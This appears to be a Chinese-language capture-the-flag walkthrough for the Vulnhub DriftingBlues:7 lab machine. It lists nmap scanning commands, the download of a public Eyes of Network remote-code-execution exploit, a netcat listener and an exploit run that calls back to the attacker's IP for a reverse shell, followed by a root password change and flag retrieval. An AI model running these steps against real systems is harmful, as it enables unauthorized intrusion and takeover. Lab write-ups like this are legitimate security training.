Vulnhub-DriftingBlues:7
目录
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
信息收集
扫描目标网段
nmap -sP 172.16.58.0/24
查看端口及服务
nmap -p- 172.16.58.135
查看服务运行的版本
nmap -sV 172.16.58.135
访问网站
我们从打开的端口进行访问,先打开80端口试一下,结果直接来到一个登陆页面
我们搜索一下Eyes of network,发现可以找到相应的exp
https://github.com/h4knet/eonrce
然后我们把它下载到kali里
git clone https://github.com/h4knet/eonrce.git
提升权限
接下来我们赋予权限
cd eonrce
chmod +x ./eonrce.py
开启监听
nc -lvp 8888
运行脚本
./eonrce.py https://172.16.58.135 -ip 172.16.58.129 -port 8888
修改root密码
passwd root
然后我们使用ssh连接靶机
ssh 172.16.58.135
输入我们刚才修改的密码
查看文件发现flag.txt
ls -al
打开文件
cat flag.txt
成功获取。